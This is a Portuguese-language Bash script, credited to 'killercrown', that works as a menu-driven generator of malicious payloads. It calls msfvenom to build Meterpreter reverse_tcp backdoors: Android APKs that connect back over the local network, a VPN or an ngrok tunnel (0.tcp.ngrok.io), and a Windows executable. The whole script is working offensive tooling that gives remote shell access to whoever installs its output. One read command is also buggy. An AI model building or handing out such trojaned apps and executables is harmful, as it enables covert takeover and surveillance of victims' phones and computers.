#!/bin/bash
#historico
# ------------------------------------------------------------------------
# ESTA FERRAMENTA ELA PERMITE GERAR UM PAYLOAD AUTOMATIZADO              *
#                    CREATE BY : killercrown                                   *
#-------------------------------------------------------------------------
# CORES
CYAN="\033[01;36m"
RED="\033[01;31m"
PRETO="\033[30m"
CLARO="\033[33m"

#   CORES
echo -e "${RED}"
figlet  "GERADOR"

echo "*---------------------------------------------------*"
echo "*[*]SEJA BEM VINDO AO GERADOR DE PAYLOAD[*]         *"
echo "               [*]create by:paulo(killercrown)[*]      "
echo "               [*]atualizado:26/02/2018 as 13:42[*]"
echo "*---------------------------------------------------*"
date
echo -e "${CYAN}*******************************************************************************"
echo -e "${RED}** [1]- REDE INTERNA  **"   "${PRETO} ***ANDROID***                            "
echo -e "${RED}** [2]- REDE EXTERNA  **"   "${PRETO}  ***ANDROID***                           "
echo -e "${RED}** [3]- REDE INTERNA ** "   "${PRETO}  ***WINDOWS***                           " 
echo -e "${CYAN}*******************************************************************************"
echo "[*]qual opcao deseja executar[*]?"
read opcao
echo "---------------------------------------------------"
echo "---------------------------------------------------"
#CRINADO PAYLOAD ANDROID EM REDE INTERNA 
if [ "$opcao" -eq "1" ]
then
clear
echo -e "${RED}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-="
echo "           CRIACAO DO PAYLOAD*AND*          * "
echo "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-="
echo "AGUARDE!"
sleep 3
clear

echo -e "${CYAN}[*]digite o ip interno *ETH0* [*]"
read interno

echo "[*]Digite a porta aberta[*] \n"
read porta

echo "[*]Digite o nome do aplicativo[*]"
read apk
WHITE="\033[01;37m"
CLARO="\033[33m"
PRETO="\033[30m"
echo "voce usou isso em " 
date
echo -e "${CLARO}CRIANDO PAYLOAD, PODE DEMORAR ALGUNS SEGUNDOS..."
msfvenom -p android/meterpreter/reverse_tcp LHOST=$interno  LPORT=$porta R > $apk.apk
echo -e "${CYAN}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-"
echo -e "${RED}**    PAYLOAD CRIADO COM SUCESSO      **"
echo -e "${RED}**    OBRIGADO POR USAR ESSA FERRAMENTA**"
echo -e "${CYAN}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-"
sleep 2
clear
cat metasploit.txt
fi
if [ "$opcao" -eq "2" ]
then
clear
echo -e "${RED}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-="
echo "           CRIACAO DO PAYLOAD[AND]          * "
echo "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-="
echo "AGUARDE!"
sleep 3
clear
echo -e "${RED}[-]WARNING: ESTA OPCAO VAI FUCIONAR COM O SERVICO NGROK[-]"
echo -e "${CLARO}[+]LIGUE O NGROK USANDO: NGROK TCP 4444(OU OUTRA PORTA)"
sleep 4
clear
echo -e "${RED}[-]VAI USAR VPN OU NGROK? [-]"
read resposta
if [ "$resposta" == "VPN" ]
then
echo -e "${CYAN}informe o ip da vpn"
read vpn
echo "informe a porta"
read pporta
echo "informe o nome do aplicativo"
read appk
msfvenom -p android/meterpreter/reverse_tcp LHOST=$vpn LPORT=$pporta R > $appk.apk
echo "CRIANDO PAYLOAD, PODE DEMORAR ALGUNS SEGUNDO..."
echo -e "${CYAN}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-"
echo -e "${RED}**    PAYLOAD CRIADO COM SUCESSO      **"
echo -e "${RED}**    OBRIGADO POR USAR ESSA FERRAMENTA**"
echo -e "${CYAN}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-"

else
echo -e "${CLARO}[+]INFORME A PORTA QUE O NGROK GEROU"
read port
echo "digite o nome do apk"
read $app
echo "CRIANDO PAYLOAD, PODE DEMORAR ALGUNS SEGUNDOS..."
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=$port R > $app.apk
echo -e "${CYAN}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-"
echo -e "${RED}**    PAYLOAD CRIADO COM SUCESSO      **"
echo -e "${RED}**    OBRIGADO POR USAR ESSA FERRAMENTA**"
echo -e "${CYAN}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-"
fi
fi
if [ "$opcao" -eq "3" ]
then
clear
echo -e "${RED}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-="
echo "           CRIACAO DO PAYLOAD*WIN*    * "
echo "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-="
echo -e "${CYAN}AGUARDE!"
sleep 3
clear
echo "[*]digite seu ip interno[ETH0]"
read ipp
echo "digite a porta aberta"
read portw
echo "digite o nome do executavel"
read exe
echo "CRIANDO PAYLOAD, PODE DEMORAR ALGUNS SEGUNDOS..."
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ipp LPORT=$portw  -f exe > $exe.exe
echo -e "${CYAN}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-"
echo -e "${RED}**    PAYLOAD CRIADO COM SUCESSO      **"
echo -e "${RED}**    OBRIGADO POR USAR ESSA FERRAMENTA**"
echo -e "${CYAN}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-"
fi
